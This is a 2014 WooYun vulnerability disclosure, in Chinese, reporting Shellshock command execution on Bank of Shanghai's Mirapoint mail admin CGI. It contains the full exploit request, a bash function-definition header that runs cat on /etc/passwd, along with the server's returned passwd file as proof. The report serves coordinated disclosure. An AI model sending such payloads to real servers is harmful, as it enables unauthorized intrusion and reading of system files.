当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078918

漏洞标题:上海银行重要内部系统命令执行

相关厂商:bankofshanghai.com

漏洞作者: 拖鞋王子

提交时间:2014-10-11 00:18

修复时间:2014-11-25 00:20

公开时间:2014-11-25 00:20

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-11: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

用神器一看今天发现上海银行重要内部系统依旧命令执行

详细说明:

GET /cgi-bin/madmin.cgi HTTP/1.1
Host: mail.bankofshanghai.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
X-Test: () { :;};a=`/bin/cat /etc/passwd`;echo $a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en,zh-CN;q=0.8,zh;q=0.6,ko;q=0.4,zh-TW;q=0.2,th;q=0.2,ja;q=0.2

漏洞证明:

HTTP/1.1 200 OK
Date: Fri, 10 Oct 2014 15:39:23 GMT
Server: Mirapoint/4.3.4-GA
root: x:0:0:root:/root:/bin/bash
bin: x:1:1:bin:/bin:/sbin/nologin
daemon: x:2:2:daemon:/sbin:/sbin/nologin
adm: x:3:4:adm:/var/adm:/sbin/nologin
lp: x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync: x:5:0:sync:/sbin:/bin/sync
shutdown: x:6:0:shutdown:/sbin:/sbin/shutdown
halt: x:7:0:halt:/sbin:/sbin/halt
mail: x:8:12:mail:/var/spool/mail:/sbin/nologin
news: x:9:13:news:/etc/news:
uucp: x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator: x:11:0:operator:/root:/sbin/nologin
games: x:12:100:games:/usr/games:/sbin/nologin
gopher: x:13:30:gopher:/var/gopher:/sbin/nologin
ftp: x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody: x:99:99:Nobody:/:/sbin/nologin
vcsa: x:69:69:virtual console memory owner:/dev:/sbin/nologin
monit: x:100:101:monit daemon:/var/lib/monit:/bin/sh
pcap: x:77:77::/var/arpwatch:/sbin/nologin
nscd: x:28:28:NSCD Daemon:/:/sbin/nologin
ntp: x:38:38::/etc/ntp:/sbin/nologin
dbus: x:81:81:System message bus:/:/sbin/nologin
rpc: x:32:32:Portmapper RPC user:/:/sbin/nologin
named: x:25:25:Named:/var/named:/sbin/nologin
sshd: x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
memcached: x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologin
oprofile: x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
haldaemon: x:68:68:HAL daemon:/:/sbin/nologin
rpcuser: x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody: x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
man: x:500:15::/home/man:/bin/bash
mira: x:70:70::/home/mira:/bin/bash
netdump: x:34:34::/home/netdump:/bin/bash
cyrus: x:70:70::/home/cyrus:/bin/bash
Cache-Control: no-cache
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=GB2312
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=GB2312'>
<META HTTP-EQUIV='Expires' CONTENT='Tue, 04 Dec 1993 21:29:02 GMT'>
<META HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<LINK REL=STYLESHEET TYPE='text/css' HREF='/extras/css/admin.css'>
<LINK REL='SHORTCUT ICON' href='/sa/Mira_bookmark.ico'>
<title>Óʼþ·þÎñÆ÷µÇ¼</title>
<script language=javascript src='/sa/sa.js'>
</script>
</head>
<body class='genLogin' onload='document.forms[0].elements[0].focus()' text='#000000' bgcolor='#efefef' leftmargin='0' topmargin='0'>
<center>
<table border='0' cellpadding='8' cellspacing='0' background='/sa/globe_full.gif' width=800>
  <tr> 
    <td width='230' align=center valign=bottom>&nbsp;</td>
    <td width='400' height='108' align=center valign=bottom>&nbsp;</td>
    <td align=center valign=bottom>&nbsp;</td>
  </tr>
  <tr align='left'> 
    <td colspan='3' valign=bottom> 
      <table width='545' border='0' cellspacing='0' cellpadding='0'>
        <tr>
          <td width='201'>&nbsp;</td>
          <td width='338'>
	    <table width='334' height='81' border='0' cellpadding='0' cellspacing='0' background='/sa/loginbanner.gif'>
	      <tr><td>&nbsp;</td></tr>
            </table>
	  </td>
        </tr>
        <tr> 
           <td colspan=2 nowrap align=right>
	     <font class='genLoginTitle' color='#f5873c'><strong>Óʼþ·þÎñÆ÷µÇ¼</strong></font>
	   </td>
         </tr>
      </table>
    </td>
  </tr>
  <tr>
    <td width='230' align=center>&nbsp;</td>
    <td align='left' colspan='2'>
      <form ACTION='/cgi-bin/madmin.cgi/sa/login.html' NAME='myform' AutoComplete='off' 
            METHOD='POST' ENCTYPE='application/x-www-form-urlencoded' onSubmit='checkjavascript(myform.browserjs);'>
      <table cellspacing=0 cellpadding=0 width=160 bgcolor=#ffffff border=0>
	<tr> 
          <td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/lefttopgrey.gif' width='12' height='12'></td>
          <td height=1 valign=top bgcolor='#cccccc'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
          <td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/righttopgrey.gif' width='12' height='12'></td>
	</tr>
        <tr> 
          <td height=11 valign=top bgcolor='#ffffff'></td>
        </tr>
        <tr> 
          <td width=1 bgcolor=#cccccc><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
          <td width=11 bgcolor=#ffffff>&nbsp;</td>
          <td align='center' valign=top>
	    <table cellspacing=0 border=0>
              <tr>
        	<td colspan='2' align='right' nowrap>
        	  <font class=text1>±ê×¼Á¬½Ó | <a href='https://mail.bankofshanghai.com/cgi-bin/madmin.cgi/sa?locale=zs_CN.utf-8L4_3'>°²È«Á¬½Ó</a></font>
        	</td>
              </tr>
              <tr>
        	<td align='right' nowrap>
		  Óû§£º
		</td>
        	<td>
		  <input type='text' size='20' name='user' value='' tabindex=1 onkeypress='checkWhich(event, login)'>
		</td>
              </tr>
              <tr>
        	<td align='right' nowrap>
		  ÃÜÂ룺
		</td>
        	<td>
		  <input type='password' size='20' name='password' value='' tabindex=2 onkeypress='checkWhich(event, login)'>
		</td>
              </tr>
              <tr>
        	<td>
		  &nbsp;
		</td>
        	<td align='right'>
		  <input type='submit' name='login' value='怬' tabindex=3 class='btn'>
		</td>
              </tr>
            </table>
	  </td>
          <td width=11 bgcolor=#ffffff><img height=1 alt=''  src='/sa/ts.gif' width=1 border=0></td>
          <td width=1 bgcolor=#cccccc></td>
        </tr>
        <tr> 
          <td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/leftbotgrey.gif' width='12' height='12'></td>
          <td height='11' valign=top bgcolor='#ffffff'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
          <td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/rightbotgrey.gif' width='12' height='12'></td>
        </tr>
        <tr> 
          <td height='1' valign=top bgcolor='#cccccc'></td>
        </tr>
      </table>
      <input type='hidden' name='timestamp' value='1412955563'>
      <input type='hidden' name='locale' value='zs_CN.utf-8L4_3'>
      <input type='hidden' name='browserjs' value='false'>
      <input type='hidden' name='mutual_lock' value=''>
      </form>
    </td>
  </tr>
  <tr> 
    <td height='65' colspan='3'>
      &nbsp;
    </td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td colspan='2' align='left'>
      <font class=text1> &nbsp;</font>
    </td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td colspan='2' align='left'>
            
<a href='/cgi-bin/madmin.cgi/sa/login.html?locale=en_US.ISO_8859-1'>
  <nobr>Ó¢Óï</nobr></a> - 
<a href='/cgi-bin/madmin.cgi/sa/login.html?locale=ja_JP.utf-8'>
  <nobr>ÈÕÓï</nobr></a> - 
<a name='/cgi-bin/madmin.cgi/sa/login.html?locale=zs_CN.utf-8L4_3'>
  <nobr>¼òÌåÖÐÎÄ</nobr></a>
    </td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td colspan='2' align='left'>
      <font class=text1>Copyright &copy; 1998-2011 <a href='http://www.mirapoint.com' target='_blank'>Mirapoint Software</a>, Inc.</font>
    </td>
  </tr>
</table>
</center>
</body>
</html>

修复方案:

版权声明:转载请注明来源 拖鞋王子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-10-15 17:40

厂商回复:

最新状态:

暂无